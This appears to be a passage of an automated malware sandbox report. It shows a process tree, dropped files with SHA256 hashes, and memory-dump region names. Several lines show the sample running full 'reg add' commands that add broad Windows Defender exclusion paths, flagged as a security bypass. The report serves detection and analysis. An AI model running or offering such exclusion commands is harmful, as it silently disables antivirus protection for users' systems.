                                                        • C:\Windows\system32\cmd.exe
                                                          "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\1tO12t" /t REG_DWORD /d 0 /f
                                                          1⤵
                                                          • Executes a command shell one-liner
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:2308
                                                          • C:\Windows\System32\reg.exe
                                                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\1tO12t" /t REG_DWORD /d 0 /f
                                                            2⤵
                                                            • Windows security bypass
                                                            PID:6124
                                                        • C:\Windows\system32\cmd.exe
                                                          cmd.exe
                                                          1⤵
                                                            PID:5320
                                                          • C:\Windows\system32\cmd.exe
                                                            "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                            1⤵
                                                            • Executes a command shell one-liner
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:3260
                                                            • C:\Windows\System32\reg.exe
                                                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                              2⤵
                                                              • Windows security bypass
                                                              PID:2524
                                                          • C:\Windows\system32\cmd.exe
                                                            "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                            1⤵
                                                            • Executes a command shell one-liner
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:2116
                                                            • C:\Windows\System32\reg.exe
                                                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                              2⤵
                                                              • Windows security bypass
                                                              PID:5380
                                                          • C:\Windows\system32\cmd.exe
                                                            "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                            1⤵
                                                            • Executes a command shell one-liner
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:5588
                                                            • C:\Windows\System32\reg.exe
                                                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                              2⤵
                                                              • Windows security bypass
                                                              PID:5636
                                                          • C:\Windows\system32\cmd.exe
                                                            "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                            1⤵
                                                            • Executes a command shell one-liner
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:3736
                                                            • C:\Windows\System32\reg.exe
                                                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                              2⤵
                                                              • Windows security bypass
                                                              PID:3232
                                                          • C:\Program Files (x86)\IBG7Lg\IBG7Lg.exe
                                                            "C:\Program Files (x86)\IBG7Lg\IBG7Lg.exe"
                                                            1⤵
                                                              PID:2484
                                                            • C:\Program Files (x86)\IBG7Lg\IBG7Lg.exe
                                                              "C:\Program Files (x86)\IBG7Lg\IBG7Lg.exe"
                                                              1⤵
                                                                PID:3336
                                                              • C:\Program Files (x86)\JyIi2r\zQJNq.exe
                                                                "C:\Program Files (x86)\JyIi2r\zQJNq.exe"
                                                                1⤵
                                                                  PID:3520
                                                                • C:\Windows\system32\cmd.exe
                                                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\IBG7Lg" /t REG_DWORD /d 0 /f
                                                                  1⤵
                                                                  • Executes a command shell one-liner
                                                                  PID:3012
                                                                • C:\Windows\system32\cmd.exe
                                                                  "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                  1⤵
                                                                  • Executes a command shell one-liner
                                                                  PID:2428

                                                                Network

                                                                      MITRE ATT&CK Enterprise v16

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      e59a5bd.rbs

                                                                      • Path C:\Config.Msi\e59a5bd.rbs
                                                                      • Size 7KB
                                                                      • SHA256 069239325e6e93626a6fe104e3d7cc3296c2f5b9a9f018b90a20d21ffe6ced23
                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                      IBG7Lg.exe

                                                                      • Path C:\Program Files (x86)\IBG7Lg\IBG7Lg.exe
                                                                      • Size 145KB
                                                                      • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                      XPSPLOG.dll

                                                                      • Path C:\Program Files (x86)\IBG7Lg\XPSPLOG.dll
                                                                      • Size 4.6MB
                                                                      • SHA256 cc8f3979a970d8eed3768df0e8bc40868c5ef7a09e6304e57a41bf4399c25acf
                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                      image.png

                                                                      • Path C:\Program Files (x86)\IBG7Lg\image.png
                                                                      • Size 4.9MB
                                                                      • SHA256 28e0a9730d961a015e5baa47c7104dc2c45c62cd8f816bdaf40fa8bce3d29f2b
                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                      thumbs.db

                                                                      • Path C:\Program Files (x86)\IBG7Lg\thumbs.db
                                                                      • Size 358KB
                                                                      • SHA256 d0a592cadbab12a83c67beda84efaee78def581b32d30aa5f91b22360153437e
                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                      XPSPLOG.dll

                                                                      • Path C:\Program Files (x86)\JyIi2r\XPSPLOG.dll
                                                                      • Size 4.6MB
                                                                      • SHA256 affa5fb32f79d1dc350af1ae611d39d4de737b06376852eb9927f9c74f369939
                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                      image.png

                                                                      • Path C:\Program Files (x86)\JyIi2r\image.png
                                                                      • Size 4.9MB
                                                                      • SHA256 e1f86d07aebb246a93dca741739f7acf451217e0f9ce6fb6571f0d38add86f17
                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                      UxEnhance64.dll

                                                                      • Path C:\Users\Public\1tO12t\UxEnhance64.dll
                                                                      • Size 3.1MB
                                                                      • SHA256 31e8a6e6a3f35f8bd1e3e1507e6a1d484735a147e69ded28f629c87ce96f7f98
                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                      adoresd.dat

                                                                      • Path C:\Users\Public\1tO12t\adoresd.dat
                                                                      • Size 4.8MB
                                                                      • SHA256 e1c8a3e5c3a26acf28da62569cd951e9a9b2118257ef5fbf6efc9a9daafab4dd
                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                      msadox.tb

                                                                      • Path C:\Users\Public\1tO12t\msadox.tb
                                                                      • Size 8KB
                                                                      • SHA256 084ab8c94411ed53d625626b82a463cd78ca855eaf3a73fa0c6716759f662c91
                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                      xse8qf.exe

                                                                      • Path C:\Users\Public\1tO12t\xse8qf.exe
                                                                      • Size 135KB
                                                                      • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                      destopbak.ini

                                                                      • Path C:\Users\Public\Music\destopbak.ini
                                                                      • Size 2B
                                                                      • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                                                      • MD5 SHA1 SHA512

                                                                      MSIAD3F.tmp

                                                                      • Path C:\Windows\Installer\MSIAD3F.tmp
                                                                      • Size 7.6MB
                                                                      • SHA256 9b8835ea6895d8dc16ac076f5013b8851c1e49f4290713ecd97e5f01acec4f81
                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                      e59a5bc.msi

                                                                      • Path C:\Windows\Installer\e59a5bc.msi
                                                                      • Size 7.7MB
                                                                      • SHA256 9b1a2e658ade78ec74264842e0019c1484efcb19b350aee30a8d62756c7c16c1
                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                      metadata-2

                                                                      • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                                                      • Size 26.1MB
                                                                      • SHA256 2a387ee9de8e2b9084072441aa3a16d8eee892c9fd93f672855274407265128b
                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                      {033bd58a-0d35-4115-8020-1bc06428c3ad}_OnDiskSnapshotProp

                                                                      • Path \??\Volume{c61f8367-0000-0000-0000-d08302000000}\System Volume Information\SPP\OnlineMetadataCache\{033bd58a-0d35-4115-8020-1bc06428c3ad}_OnDiskSnapshotProp
                                                                      • Size 6KB
                                                                      • SHA256 c069a44fdf00a1d652c9c1e5558411faa8f1aa5aabc89ae2a1d793fa1e99c57e
                                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                      xxxx.ini

                                                                      • Path \??\c:\xxxx.ini
                                                                      • Size 2B
                                                                      • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                                                      • MD5 SHA1 SHA512

                                                                      memory/2064-109-0x00000289B1810000-0x00000289B1832000-memory.dmp

                                                                      memory/2064-116-0x00000289B1880000-0x00000289B188A000-memory.dmp

                                                                      memory/2064-113-0x00000289B1AA0000-0x00000289B1B52000-memory.dmp

                                                                      memory/2064-112-0x00000289B1860000-0x00000289B187E000-memory.dmp

                                                                      memory/2484-243-0x00000000748A0000-0x0000000074FEA000-memory.dmp

                                                                      memory/2484-242-0x0000000001120000-0x0000000001121000-memory.dmp

                                                                      memory/3084-64-0x00000291B51E0000-0x00000291B5A9E000-memory.dmp

                                                                      memory/3084-71-0x00000291B51E0000-0x00000291B5A9E000-memory.dmp

                                                                      memory/3084-86-0x00000291B5AA0000-0x00000291B5B2A000-memory.dmp

                                                                      memory/3084-88-0x00000291B5AA0000-0x00000291B5B2A000-memory.dmp

                                                                      memory/3084-87-0x00000291B5AA0000-0x00000291B5B2A000-memory.dmp

                                                                      memory/3084-91-0x00000291B51E0000-0x00000291B5A9E000-memory.dmp

                                                                      memory/3084-93-0x00000291B51E0000-0x00000291B5A9E000-memory.dmp

                                                                      memory/3084-94-0x00000291B51E0000-0x00000291B5A9E000-memory.dmp

                                                                      memory/3084-84-0x00000291B2ED0000-0x00000291B2F1E000-memory.dmp

                                                                      memory/3084-78-0x00000291B51E0000-0x00000291B5A9E000-memory.dmp

                                                                      memory/3084-74-0x00000291B51E0000-0x00000291B5A9E000-memory.dmp

                                                                      memory/3084-73-0x00000291B51E0000-0x00000291B5A9E000-memory.dmp

                                                                      memory/3084-72-0x00000291B51E0000-0x00000291B5A9E000-memory.dmp

                                                                      memory/3084-58-0x00007FF8C4290000-0x00007FF8C4292000-memory.dmp

                                                                      memory/3084-59-0x00007FF8A07D0000-0x00007FF8A0CEE000-memory.dmp

                                                                      memory/3084-66-0x00007FF8C42A0000-0x00007FF8C42A2000-memory.dmp

                                                                      memory/3084-67-0x00000291B51E0000-0x00000291B5A9E000-memory.dmp

                                                                      memory/3084-89-0x00000291B5AA0000-0x00000291B5B2A000-memory.dmp

                                                                      memory/3336-253-0x0000000001190000-0x0000000001191000-memory.dmp

                                                                      memory/3336-254-0x00000000748A0000-0x0000000074FEA000-memory.dmp

                                                                      memory/3356-265-0x00000000022F0000-0x0000000002326000-memory.dmp

                                                                      memory/3356-266-0x0000000004F20000-0x000000000556A000-memory.dmp

                                                                      memory/3520-260-0x0000000072B30000-0x000000007327A000-memory.dmp

                                                                      memory/3520-263-0x00000000034B0000-0x0000000003C99000-memory.dmp

                                                                      memory/3520-258-0x0000000000B70000-0x0000000000B71000-memory.dmp

                                                                      memory/4180-193-0x0000000003580000-0x0000000003D69000-memory.dmp

                                                                      memory/4180-206-0x0000000003580000-0x0000000003D69000-memory.dmp

                                                                      memory/4180-210-0x0000000010000000-0x0000000010061000-memory.dmp

                                                                      memory/4180-185-0x0000000000E30000-0x0000000000E31000-memory.dmp

                                                                      memory/4180-249-0x0000000003580000-0x0000000003D69000-memory.dmp

                                                                      memory/4180-186-0x00000000748A0000-0x0000000074FEA000-memory.dmp

                                                                      memory/4180-190-0x0000000003580000-0x0000000003D69000-memory.dmp

                                                                      memory/4180-219-0x0000000003580000-0x0000000003D69000-memory.dmp

                                                                      memory/4180-204-0x00000000012B0000-0x00000000012C4000-memory.dmp

                                                                      memory/4180-192-0x0000000000E60000-0x0000000000E61000-memory.dmp

                                                                      memory/4180-197-0x0000000003580000-0x0000000003D69000-memory.dmp

                                                                      memory/4808-12-0x00007FF8C4290000-0x00007FF8C4292000-memory.dmp

                                                                      memory/4808-13-0x00007FF8A0690000-0x00007FF8A0CE2000-memory.dmp

                                                                      memory/4808-16-0x00007FF8AA420000-0x00007FF8AA432000-memory.dmp

                                                                      memory/4808-40-0x00007FF8AA420000-0x00007FF8AA432000-memory.dmp